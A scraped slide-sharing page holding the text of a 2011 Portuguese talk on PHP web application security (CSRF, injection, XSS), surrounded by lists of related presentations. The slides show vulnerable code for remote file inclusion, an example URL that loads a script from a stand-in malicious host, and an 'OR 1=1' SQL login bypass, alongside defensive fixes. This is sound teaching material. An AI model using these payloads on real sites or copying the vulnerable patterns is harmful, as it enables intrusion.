Soumettre la recherche
Mettre en ligne
Segurança TDC 2011
•
1 j'aime
•
513 vues
Kinn Julião
Suivre
Technologie
Signaler
Partager
Signaler
Partager
1 sur 21
Recommandé
Website security
Website security
thiagosenac
Test
Test
astonishingphil07
Cultura ciudadana unidad 1 Ingrid Nieto
Cultura ciudadana unidad 1 Ingrid Nieto
Ingrid Aguilar
Khemah Transformasi Gereja 2013
Khemah Transformasi Gereja 2013
SIB Kuching Bahasa Malaysia
The Meaning of Wealth Protection
The Meaning of Wealth Protection
Trusted Advisory
Ask Yourself
Ask Yourself
Trusted Advisory
プレスリリース 企業
プレスリリース 企業
LOVE&Co.
20151105交通部:「2015年台北國際旅展籌辦情形」報告
20151105交通部:「2015年台北國際旅展籌辦情形」報告
R.O.C.Executive Yuan
Contenu connexe
En vedette
Борьба за свою землю.
Борьба за свою землю.
sergnovoros
Humane Approach to Urban Planning Final
Humane Approach to Urban Planning Final
Priya Chaudhary
Resumen tabla verbos inglés para Grado Medio
Resumen tabla verbos inglés para Grado Medio
marta velasco gonzalez
Palabras rosa
Palabras rosa
Eva Díaz Sánchez
Jazz up your Language classes with echnology
Jazz up your Language classes with echnology
Jennifer Verschoor
Games for young learners
Games for young learners
Jennifer Verschoor
Urban land use
Urban land use
Noel Hogan
Digital Skills for 21st Century Teachers
Digital Skills for 21st Century Teachers
Jennifer Verschoor
Graphic Organisers
Graphic Organisers
Noel Hogan
En vedette
(9)
Борьба за свою землю.
Борьба за свою землю.
Humane Approach to Urban Planning Final
Humane Approach to Urban Planning Final
Resumen tabla verbos inglés para Grado Medio
Resumen tabla verbos inglés para Grado Medio
Palabras rosa
Palabras rosa
Jazz up your Language classes with echnology
Jazz up your Language classes with echnology
Games for young learners
Games for young learners
Urban land use
Urban land use
Digital Skills for 21st Century Teachers
Digital Skills for 21st Century Teachers
Graphic Organisers
Graphic Organisers
Similaire à Segurança TDC 2011
Slides do Treinamento - OWASP TOP 10 (Em português)
Slides do Treinamento - OWASP TOP 10 (Em português)
Julio Cesar Stefanutto
Segurança em PHP
Segurança em PHP
Augusto Pascutti
Top 5 vulnerabilidades_em_aplicacoes_web
Top 5 vulnerabilidades_em_aplicacoes_web
Luis Asensio
Top 5 vulnerabilidades_em_aplicacoes_web_e_seu
Top 5 vulnerabilidades_em_aplicacoes_web_e_seu
Luis Asensio
Desenvolvimento de Aplicações Web Seguras
Desenvolvimento de Aplicações Web Seguras
Dércio Luiz Reis
Modos De OperaçãO Snort Campusparty2010
Modos De OperaçãO Snort Campusparty2010
clebeer brandao
Modos De OperaçãO Snort Campusparty2010
Modos De OperaçãO Snort Campusparty2010
clebeer brandao
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...
tdc-globalcode
Fuzzing com ZAP (Zed Attack Proxy)
Fuzzing com ZAP (Zed Attack Proxy)
Maurício Harley
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Magno Logan
Desenvolvendo sistemas seguros com PHP
Desenvolvendo sistemas seguros com PHP
Flavio Souza
Segurança em aplicações php
Segurança em aplicações php
Rodrigo Dos Santos
PHP Seguro em 2013
PHP Seguro em 2013
Patrick Kaminski
Presentacion de Seguridad - MVP Conf 2019
Presentacion de Seguridad - MVP Conf 2019
Enrique Gustavo Dutra
PHP Desenvolvimento Seguro
PHP Desenvolvimento Seguro
Flávio Lisboa
Ransomware
Ransomware
Marcelo Lau
Pentest com Kali Linux - LatinoWare 2015
Pentest com Kali Linux - LatinoWare 2015
Alcyon Ferreira de Souza Junior, MSc
Forense computacional e seguranca da informacao
Forense computacional e seguranca da informacao
Marcelo Lau
Tratando as vulnerabilidades do Top 10 com php
Tratando as vulnerabilidades do Top 10 com php
Conviso Application Security
Workshop - Testes de Segurança
Workshop - Testes de Segurança
Alan Carlos
Similaire à Segurança TDC 2011
(20)
Slides do Treinamento - OWASP TOP 10 (Em português)
Slides do Treinamento - OWASP TOP 10 (Em português)
Segurança em PHP
Segurança em PHP
Top 5 vulnerabilidades_em_aplicacoes_web
Top 5 vulnerabilidades_em_aplicacoes_web
Top 5 vulnerabilidades_em_aplicacoes_web_e_seu
Top 5 vulnerabilidades_em_aplicacoes_web_e_seu
Desenvolvimento de Aplicações Web Seguras
Desenvolvimento de Aplicações Web Seguras
Modos De OperaçãO Snort Campusparty2010
Modos De OperaçãO Snort Campusparty2010
Modos De OperaçãO Snort Campusparty2010
Modos De OperaçãO Snort Campusparty2010
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...
Fuzzing com ZAP (Zed Attack Proxy)
Fuzzing com ZAP (Zed Attack Proxy)
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Desenvolvendo sistemas seguros com PHP
Desenvolvendo sistemas seguros com PHP
Segurança em aplicações php
Segurança em aplicações php
PHP Seguro em 2013
PHP Seguro em 2013
Presentacion de Seguridad - MVP Conf 2019
Presentacion de Seguridad - MVP Conf 2019
PHP Desenvolvimento Seguro
PHP Desenvolvimento Seguro
Ransomware
Ransomware
Pentest com Kali Linux - LatinoWare 2015
Pentest com Kali Linux - LatinoWare 2015
Forense computacional e seguranca da informacao
Forense computacional e seguranca da informacao
Tratando as vulnerabilidades do Top 10 com php
Tratando as vulnerabilidades do Top 10 com php
Workshop - Testes de Segurança
Workshop - Testes de Segurança
Segurança TDC 2011
1.
Mantenha suas aplicações
protegidas contra usuários mal intencionados
2.
3.
Gerente de projetos
- RPM
4.
Consultor em Software
Livre
5.
7 anos de
experiência em Desenvolvimento
6.
Analista de Sistemas
7.
8.
9.
PHPConference, SOLISC e
etc.
10.
@kinncj, fb.com/kinncj, linkedin.com/in/kinncj
11.
12.
CSRF
13.
INJECTION
14.
XSS
15.
16.
XSS
17.
XSS
18.
19.
20.
<?php
21.
include $_GET['pagina'];
22.
// http://localhost/pagina=http://sitedomal.com/script.txt
23.
24.
<?php
25.
$paginas = array('home','admin');
26.
if(in_array($_GET['pagina'],$paginas)){
27.
include “../paginas/”.$_GET['pagina'].”.php”;
28.
}else{
29.
echo “Ops, pagina
nao encontrada”;
30.
}
31.
// http://localhost/pagina=http://sitedomal.com/script.txt
32.
CSRF
33.
34.
35.
SQL Injection
36.
37.
SQL Injection
38.
39.
$query_string = "SELECT
* FROM usuarios WHERE codigo = '{$usuario}' AND senha = '{$senha}'";
40.
41.
SELECT * FROM
usuarios WHERE codigo = '' OR 1=1 AND senha = '' OR 1=1
42.
PHP
43.
$usuario = mysql_real_escape_string(addslashes($usuario));
44.
$senha = mysql_real_escape_string(addslashes($senha));
45.
$query_string = "SELECT
* FROM usuarios WHERE codigo = '{$usuario}' AND senha = '{$senha}'"
46.
47.
48.
CSRF
49.
Injection
50.